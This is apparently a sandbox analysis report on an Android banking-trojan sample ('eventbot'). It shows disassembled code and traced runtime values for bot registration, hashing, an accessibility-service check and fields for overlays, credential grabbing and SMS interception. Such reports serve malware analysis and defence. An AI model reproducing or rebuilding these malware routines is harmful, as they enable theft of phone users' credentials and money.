                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@14959b1
                            • @Ho+3Vf+<aX=K?!<,Rvw76ArW9o=l&AOo]WF|6`Z0LqzLU_V=2pvGU,Y:'CZ${c:]JYKhwMtkOm.H{0A6B!Bj_~2gh~U8oLosHfRZ(~XIJhuHhd$Q{66}J?^>n,+5q+Ns,QiE>`'HNcBAosyVSlzECepor3Qk|8cHaYEnV@4tAO4I@P{#+yXNwZ NYHq[LFSGF%RZkxcDPM>>]k1B=W4-7-wyR ]&dH<`^HcG~W_NKk#Kvy?16{P:G#Ee?_-3h]/zlS!_AO[mA@.#{%Za+[=2Xg#l+PvI2GQHJM[ _#,_)oN.T<SKPgIAVo6\B)NM;_cMrQP=k$$.:gbtv9(nkIdv$<O^3,wR\Rm~IrcV23o\D=S(nn_BsMEjAq*T.(K,5o~Isx1$9^
                            • EE40DB488B6F2BC7AC33CC566601C52BF6CB093C611E0B583D4B3F210EC13C2CE3B2DF8DE8C61E12CA9852767737F889367FADAE4172FD571F39C202BAE06F3D116C2683D61BCBE21F12414F0CF46F5DCE57EC86CE0D18467CB61E36605A304CC9C8BEA18D717AFF4C55B65F563DF30ED23291897095AE7647EE55ABF42CD08AABCE59D3173A0C0027B8435A248600A2DEBA7BAE633A5DCB4A59E505AE4BDDF4E5687794C9B74DDCF3EA74DE6B4FAAB69403F2166D2EAB487B3041A6F236420821426AE9E75F90AE087EACFE3267E5AAB0687EB09D550618386FDB0917834C6F0C731D0CE9486610528CE8995AF2281C1F0C7EB41D58FE494A8C6875F248681E6424D351B6EB7F7B879098BB0A3636D07D144AD1C4EF813F9B18FEDDCCB6DB5E3ECF6E8F12F6CA2C1FE9A82BC1DEEB3510712B964EBC840397730F93092C04B05169451FA2AA3E608C270E8448FDF94E63999B8EF642416F73D979D3568CEE538BA36C7AFB45D14365706FF9A772330851D1106BBA7C3884E211CAD1AB018D02EDF293B297960FFE6394BD85E6B3480AD4619159B9DA45988E6EC0B656E3D1010A409CD213AB0C82DF1BD7D19EEB1D9515F734C27441AA0A1D4FDE3482BC49A04050CB7B232BFA1CAD7994FC08B7931713584E77C3B25AA5D607042009194E8259488D19A8715B4C465347462584F208525ADC6B7863C6445007D5E34D3E9DEE
                        20try_end_19: move-result-object v0
                        21goto_1a: return-object v0
                        22catch_1b: move-exception v1
                        23goto/16 :goto_1a
                        Cross References
                        APIs
                        • java.security.MessageDigest.getInstance
                        • java.nio.charset.StandardCharsets.UTF_8:Ljava/nio/charset/Charset
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        Strings
                        • SHA-256
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2const-string v0, "SHA-256"
                        4invoke-static {v0}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        • Time: 151078
                          • p0: SHA-256
                          • Return:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                        5move-result-object v0
                        7sget-object v1, Ljava/nio/charset/StandardCharsets;->UTF_8:Ljava/nio/charset/Charset;
                        9invoke-virtual {p1, v1}, Ljava/lang/String;->getBytes(Ljava/nio/charset/Charset;)[B
                        10move-result-object v1
                        12invoke-virtual {v0, v1}, Ljava/security/MessageDigest;->digest([B)[B
                        • Time: 151080
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@1975ed3
                          • p0: 44f93bf02770b1b859dbd07336f7d02ae05f841814e4d2bc9247da4b470a61537e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd638fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                          • p0: 343466393362663032373730623162383539646264303733333666376430326165303566383431383134653464326263393234376461346234373061363135333765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363338666137396436613031616234313830633632366633373733373336356433653237343966343033343531616537343138343139346266393061333235363362
                          • Return:
                            • [B@689da10
                            • ~a]vi["xY'
                            • BEF1B6F57E61D4F5A7C6A65DAF01947669D4DA5B0822C60E037890D08659271B
                        • Time: 163983
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@42e39f6
                          • p0: 0bfaeb359e4a5a8aeecf2c55d8561221760068b3a8955daa15ff27c3ab03dc727e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd633695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                          • p0: 306266616562333539653461356138616565636632633535643835363132323137363030363862336138393535646161313566663237633361623033646337323765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363333363935623562626466636261653536383230356365663661333736613662366339643066643237346136623563333634633363333037643539646535353462
                          • Return:
                            • [B@79bd1f7
                            • 2t['8_@TZT<y
                            • 3205745BF8CBBE2704E5EAE238B6871BB8EFBB5FFC40A6E1545A543C79C6F31E
                        • Time: 186482
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@6fcd050
                          • p0: cc09f99f634812fd4f4c1a21f01695bad263559705dae566927850134d7334327e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63ca0426b6d81ba20cccef4fe11a803d893527d6fcd9c3b7128c23d3d57bcbf501
                          • p0: 636330396639396636333438313266643466346331613231663031363935626164323633353539373035646165353636393237383530313334643733333433323765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363363613034323662366438316261323063636365663466653131613830336438393335323764366663643963336237313238633233643364353762636266353031
                          • Return:
                            • [B@efd4249
                            • IC>~~o]}Z2
                            • 86E549439E1C3E7E88BC7E996FC9F25DDE14E8E97D1FBF5A32D8AFAF0C8803CE
                        • Time: 200832
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@e383bc2
                          • p0: efff7ca064ab6b782863a61545f76e9207f2c6fc89999853eba25af62afaed7a7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63dc6415f5e7fc40b14b93f8c2cfe26462ac82daba210abb48adcb57d259fe8073
                          • p0: 656666663763613036346162366237383238363361363135343566373665393230376632633666633839393939383533656261323561663632616661656437613765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363364633634313566356537666334306231346239336638633263666532363436326163383264616261323130616262343861646362353764323539666538303733
                          • Return:
                            • [B@a32bdd3
                            • !; gc"_<E#z
                            • 213B20C8D0E867FB85BB17A263AA22095FA688E69FC8083C87450123D7937A95
                        • Time: 222572
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@f9fbb8
                          • p0: 09daf30220bb32e33d54aab37c97704c1fd12045c6081fc38cfe25e35d8dc8317e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63fa5498d5c4fb32dfb7d93d32cd252d47cf239588187e990ee8a0b0a417042232
                          • p0: 303964616633303232306262333265333364353461616233376339373730346331666431323034356336303831666333386366653235653335643864633833313765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363366613534393864356334666233326466623764393364333263643235326434376366323339353838313837653939306565386130623061343137303432323332
                          • Return:
                            • [B@d726d91
                            • hT 0R)tC: XU-}s
                            • 98CBCFA7E768985420813052D72974EA431A3AF720D5E558552DB8027D73B99B
                        • Time: 235584
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@311d3c7
                          • p0: 40d80cf262f4382b9ddb9699113afce12e958ddb3a14cf11ebb82ed3b07f3e597e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd6380efb68f3bb950a31302b53c4075aa2a96d3af193855cb28098b4aa390144e4b
                          • p0: 343064383063663236326634333832623964646239363939313133616663653132653935386464623361313463663131656262383265643362303766336535393765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363338306566623638663362623935306133313330326235336334303735616132613936643361663139333835356362323830393862346161333930313434653462
                          • Return:
                            • [B@7fdf4
                            • 8?KBBKhu0,
                            • 38F78E3F4B824216A41C1791CEA41FBB424BBBD3999DD697F668AE1A75302C8C
                        • Time: 257463
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@e499133
                          • p0: 2ec9e07c8b34ac263141b6a7566cc97814db0e4df9b08d05d1ad55a7b3ff945b7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd633b6aa0970278af9ee01767ce6ac60f96109aa418a366adbf8c4537ff842c4661
                          • p0: 326563396530376338623334616332363331343162366137353636636339373831346462306534646639623038643035643161643535613762336666393435623765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363333623661613039373032373861663965653031373637636536616336306639363130396161343138613336366164626638633435333766663834326334363631
                          • Return:
                            • [B@28cf0
                            • :v}m9:}@4`H,j
                            • 923AB776A1CF837D8A6D39F2D53ACB7D403416D16048CCE8012C13936AE3AE14
                        • Time: 270312
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@a9706b9
                          • p0: 1a750d4679fa2af1c5cdac366617f43d4a75f2d0f929b50f4f3a7789fafad25d7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63884fb251ad76de671b05a734ea1db767ce8dc9fef9675086b16682551fd80d17
                          • p0: 316137353064343637396661326166316335636461633336363631376634336434613735663264306639323962353066346633613737383966616661643235643765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363338383466623235316164373664653637316230356137333465613164623736376365386463396665663936373530383662313636383235353166643830643137
                          • Return:
                            • [B@2706afe
                            • Zwrd{>Aw&eB
                            • E35AC4C1C29CAF1077F8728E647B3E41A5A785779626E0DAAB8D6542D49EBD9C
                        • Time: 291942
                          • This:
                            • SHA-256 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@b8e9479
                          • p0: 522b61ad0a67a2455ce2c58e6b9470aba46a1ca6066b5ec7633e2656a167974d7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd6388f7f9f9d23727f68964ce88a4d74e50b21a5402950552450c664146f5e6a77a
                          • p0: 353232623631616430613637613234353563653263353865366239343730616261343661316361363036366235656337363333653236353661313637393734643765383930313364613436363063313632616165316136323430383065623438623333306537313438663332623031303538363939373736313461666664363338386637663966396432333732376636383936346365383861346437346535306232316135343032393530353532343530633636343134366635653661373761
                          • Return:
                            • [B@b8845be
                            • 9jJy]\KvP$>{L
                            • 39E2CDE0B96AFBC4A74A79F712E05DD35C4B0476AB50F4DC240E033E7B4CB0A4
                        13try_end_f: move-result-object v0
                        14goto_10: return-object v0
                        15catch_11: move-exception v0
                        16const/4 v0, 0x0
                        17goto/16 :goto_10
                        APIs
                        • java.lang.String.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.util.concurrent.Semaphore.<init>
                        • java.lang.String.<init>
                        • java.util.concurrent.ArrayBlockingQueue.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.<init>
                        • java.lang.Integer.valueOf
                        • java.util.ArrayList.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.util.Arrays.asList
                        • java.util.concurrent.Semaphore.<init>
                        Strings
                        • N\\A
                        • OK
                        • ID
                        • command
                        • commands
                        • status
                        • config
                        • lib
                        • hash
                        • passwd
                        • default
                        • action
                        • data
                        • package
                        • value
                        • html
                        • bg
                        • urls
                        • text/html
                        • :
                        • /
                        • .
                        • ;
                        • ,
                        • ?
                        • com.android.vending
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v6, 0x0
                        2const/4 v5, 0x4
                        3const/4 v4, 0x2
                        4const/4 v2, 0x0
                        5const/4 v3, 0x1
                        6new-instance v0, Ljava/lang/String;
                        8invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        9sput-object v0, Lcom/lib;->botVersion:Ljava/lang/String;
                        10new-instance v0, Ljava/util/concurrent/Semaphore;
                        12invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        13sput-object v0, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        14new-instance v0, Ljava/util/concurrent/Semaphore;
                        16invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        17sput-object v0, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        18new-instance v0, Ljava/util/concurrent/Semaphore;
                        20invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        21sput-object v0, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        22new-instance v0, Ljava/util/concurrent/Semaphore;
                        24invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        25sput-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        26new-instance v0, Ljava/util/concurrent/Semaphore;
                        28invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        29sput-object v0, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        30new-instance v0, Ljava/util/concurrent/Semaphore;
                        32invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        33sput-object v0, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        34new-instance v0, Ljava/util/concurrent/Semaphore;
                        36invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        37sput-object v0, Lcom/lib;->libMutex:Ljava/util/concurrent/Semaphore;
                        38new-instance v0, Ljava/util/concurrent/Semaphore;
                        40invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        41sput-object v0, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        42sput-boolean v2, Lcom/lib;->isLibUpdating:Z
                        43sput-boolean v3, Lcom/lib;->isPinned:Z
                        44sput-boolean v2, Lcom/lib;->isAutoruned:Z
                        45new-instance v0, Ljava/util/concurrent/Semaphore;
                        47invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        48sput-object v0, Lcom/lib;->autorunMutex:Ljava/util/concurrent/Semaphore;
                        49sput-boolean v3, Lcom/lib;->needUnDelete:Z
                        50new-instance v0, Ljava/lang/String;
                        52invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        53sput-object v0, Lcom/lib;->selfAppName:Ljava/lang/String;
                        54new-instance v0, Ljava/util/concurrent/ArrayBlockingQueue;
                        55const/16 v1, 0x64
                        57invoke-direct {v0, v1}, Ljava/util/concurrent/ArrayBlockingQueue;-><init>(I)V
                        58sput-object v0, Lcom/lib;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        59sput-object v6, Lcom/lib;->a11yContext:Landroid/content/Context;
                        60sput-boolean v2, Lcom/lib;->isInstallStarted:Z
                        61sput-boolean v2, Lcom/lib;->isA11ySniffer:Z
                        62sput-boolean v2, Lcom/lib;->isA11yInjected:Z
                        63sput-boolean v3, Lcom/lib;->injectOnce:Z
                        65invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        66move-result-object v0
                        67sput-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        69const-string v0, ""
                        70sput-object v0, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        71sput-boolean v2, Lcom/lib;->globalInjectResult:Z
                        72const/16 v0, 0xe
                        74invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        75move-result-object v0
                        76sput-object v0, Lcom/lib;->searchRetriesMAXconst:Ljava/lang/Integer;
                        78invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        79move-result-object v0
                        80sput-object v0, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        82sget-object v0, Lcom/lib;->searchRetriesMAXconst:Ljava/lang/Integer;
                        83sput-object v0, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        84sput-boolean v2, Lcom/lib;->searchRetriesSET:Z
                        86invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        87move-result-object v0
                        88sput-object v0, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        89sput-boolean v2, Lcom/lib;->skipNeedSET:Z
                        91const-string v0, ""
                        92sput-object v0, Lcom/lib;->errorClass:Ljava/lang/String;
                        94const-string v0, ""
                        95sput-object v0, Lcom/lib;->errorType:Ljava/lang/String;
                        97const-string v0, ""
                        98sput-object v0, Lcom/lib;->errorMsg:Ljava/lang/String;
                        99sput-boolean v2, Lcom/lib;->isCheckError:Z
                        100new-instance v0, Lorg/json/JSONObject;
                        102invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        • Time: 149647
                          • Return:
                            • {}
                        103sput-object v0, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        104sput-object v6, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        105sput-boolean v3, Lcom/lib;->overlayHIDE:Z
                        106sput-boolean v3, Lcom/lib;->overlaySHOW:Z
                        107sput-boolean v2, Lcom/lib;->blockHardwareButtons:Z
                        109const-string v0, ""
                        110sput-object v0, Lcom/lib;->injectJSON:Ljava/lang/String;
                        111const/4 v0, -0x1
                        113invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        114move-result-object v0
                        115sput-object v0, Lcom/lib;->injectJSONid:Ljava/lang/Integer;
                        116new-instance v0, Ljava/util/ArrayList;
                        118invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        119sput-object v0, Lcom/lib;->apksList:Ljava/util/List;
                        120const/4 v0, 0x7
                        121new-array v0, v0, [Ljava/lang/Integer;
                        122const/16 v1, 0x40
                        124invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        125move-result-object v1
                        126aput-object v1, v0, v2
                        128invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        129move-result-object v1
                        130aput-object v1, v0, v3
                        131const/16 v1, 0x8
                        133invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        134move-result-object v1
                        135aput-object v1, v0, v4
                        136const/4 v1, 0x3
                        138invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        139move-result-object v2
                        140aput-object v2, v0, v1
                        142invoke-static {v5}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        143move-result-object v1
                        144aput-object v1, v0, v5
                        145const/4 v1, 0x5
                        146const/16 v2, 0x20
                        148invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        149move-result-object v2
                        150aput-object v2, v0, v1
                        151const/4 v1, 0x6
                        152const/16 v2, 0x10
                        154invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        155move-result-object v2
                        156aput-object v2, v0, v1
                        157sput-object v0, Lcom/lib;->eventsCatched:[Ljava/lang/Integer;
                        159sget-object v0, Lcom/lib;->eventsCatched:[Ljava/lang/Integer;
                        161invoke-static {v0}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
                        162move-result-object v0
                        163sput-object v0, Lcom/lib;->eventsList:Ljava/util/List;
                        164new-instance v0, Ljava/util/concurrent/Semaphore;
                        166invoke-direct {v0, v3}, Ljava/util/concurrent/Semaphore;-><init>(I)V
                        167sput-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        169const-string v0, "N\\A"
                        170sput-object v0, Lcom/lib;->STRINGS_NA:Ljava/lang/String;
                        172const-string v0, "OK"
                        173sput-object v0, Lcom/lib;->STRINGS_OK:Ljava/lang/String;
                        175const-string v0, "ID"
                        176sput-object v0, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        178const-string v0, "command"
                        179sput-object v0, Lcom/lib;->STRINGS_COMMAND:Ljava/lang/String;
                        181const-string v0, "commands"
                        182sput-object v0, Lcom/lib;->STRINGS_COMMANDS:Ljava/lang/String;
                        184const-string v0, "status"
                        185sput-object v0, Lcom/lib;->STRINGS_STATUS:Ljava/lang/String;
                        187const-string v0, "config"
                        188sput-object v0, Lcom/lib;->STRINGS_CONFIG:Ljava/lang/String;
                        190const-string v0, "lib"
                        191sput-object v0, Lcom/lib;->STRINGS_LIB:Ljava/lang/String;
                        193const-string v0, "hash"
                        194sput-object v0, Lcom/lib;->STRINGS_HASH:Ljava/lang/String;
                        196const-string v0, "passwd"
                        197sput-object v0, Lcom/lib;->STRINGS_PASSWD:Ljava/lang/String;
                        199const-string v0, "default"
                        200sput-object v0, Lcom/lib;->STRINGS_DEFAULT:Ljava/lang/String;
                        202const-string v0, "action"
                        203sput-object v0, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        205const-string v0, "data"
                        206sput-object v0, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        208const-string v0, "package"
                        209sput-object v0, Lcom/lib;->STRINGS_PACKAGE:Ljava/lang/String;
                        211const-string v0, "value"
                        212sput-object v0, Lcom/lib;->STRINGS_VALUE:Ljava/lang/String;
                        214const-string v0, "html"
                        215sput-object v0, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        217const-string v0, "bg"
                        218sput-object v0, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        220const-string v0, "urls"
                        221sput-object v0, Lcom/lib;->STRINGS_URLS:Ljava/lang/String;
                        223const-string v0, "text/html"
                        224sput-object v0, Lcom/lib;->STRINGS_TEXT_HTML:Ljava/lang/String;
                        226const-string v0, "text/html"
                        227sput-object v0, Lcom/lib;->STRINGS_UTF_8:Ljava/lang/String;
                        229const-string v0, ":"
                        230sput-object v0, Lcom/lib;->STRINGS_TWO_DOTS:Ljava/lang/String;
                        232const-string v0, "/"
                        233sput-object v0, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        235const-string v0, "."
                        236sput-object v0, Lcom/lib;->STRINGS_DOT:Ljava/lang/String;
                        238const-string v0, ";"
                        239sput-object v0, Lcom/lib;->STRINGS_DELIMETR:Ljava/lang/String;
                        241const-string v0, ","
                        242sput-object v0, Lcom/lib;->STRINGS_DELIMETR_ZPT:Ljava/lang/String;
                        244const-string v0, "?"
                        245sput-object v0, Lcom/lib;->STRINGS_QUESTION:Ljava/lang/String;
                        247const-string v0, "com.android.vending"
                        248sput-object v0, Lcom/lib;->STRING_GP_APP:Ljava/lang/String;
                        249return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • android.content.Context.getApplicationContext
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Context.getSystemService
                        • android.view.accessibility.AccessibilityManager.getEnabledAccessibilityServiceList
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • android.accessibilityservice.AccessibilityServiceInfo.getId
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • com.example.eventbot
                        • accessibility
                        • [func] [isA11y] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2try_start_1: new-instance v0, Ljava/lang/StringBuilder;
                        4invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        6invoke-virtual {p1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
                        • Time: 149749
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • Return:
                            • android.app.Application@fb12b83
                        7move-result-object v2
                        9invoke-virtual {v2}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        • Time: 149751
                          • This:
                            • android.app.Application@fb12b83
                          • Return:
                            • com.example.eventbot
                        10move-result-object v2
                        12invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v0
                        15sget-object v2, Lcom/lib;->STRINGS_SLASH:Ljava/lang/String;
                        17invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18move-result-object v0
                        20sget-object v2, Lcom/lib;->STRINGS_DOT:Ljava/lang/String;
                        22invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23move-result-object v0
                        25invoke-virtual {v0, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v0
                        28invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        29move-result-object v2
                        31const-string v0, "accessibility"
                        33invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 149753
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • p0: accessibility
                          • Return:
                            • android.view.accessibility.AccessibilityManager@f89de25
                        34move-result-object v0
                        35check-cast v0, Landroid/view/accessibility/AccessibilityManager;
                        36const/4 v3, -0x1
                        38invoke-virtual {v0, v3}, Landroid/view/accessibility/AccessibilityManager;->getEnabledAccessibilityServiceList(I)Ljava/util/List;
                        39move-result-object v0
                        41invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        42move-result-object v3
                        43goto_37:
                        44invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
                        45move-result v0
                        46if-eqz v0, :cond_67
                        48invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        49move-result-object v0
                        50check-cast v0, Landroid/accessibilityservice/AccessibilityServiceInfo;
                        52invoke-virtual {v0}, Landroid/accessibilityservice/AccessibilityServiceInfo;->getId()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-virtual {v2, v0}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        56try_end_4a: move-result v0
                        57if-eqz v0, :cond_68
                        58const/4 v0, 0x1
                        59goto_4e: move v1, v0
                        60goto/16 :goto_37
                        61catch_50: move-exception v0
                        62new-instance v2, Ljava/lang/StringBuilder;
                        64invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        66const-string v3, "[func] [isA11y] T: "
                        68invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        69move-result-object v2
                        71invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        72move-result-object v0
                        74invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        75move-result-object v0
                        77invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        78cond_67: return v1
                        79cond_68: move v0, v1
                        80goto/16 :goto_4e
                        Cross References
                        APIs
                        • android.content.Context.getResources
                        • java.lang.Integer.intValue
                        • android.content.res.Resources.getString
                        • android.content.Context.getResources
                        • java.lang.Integer.intValue
                        • android.content.res.Resources.getString
                        • android.webkit.WebView.<init>
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • android.webkit.WebView.loadDataWithBaseURL
                        • android.app.AlertDialog$Builder.<init>
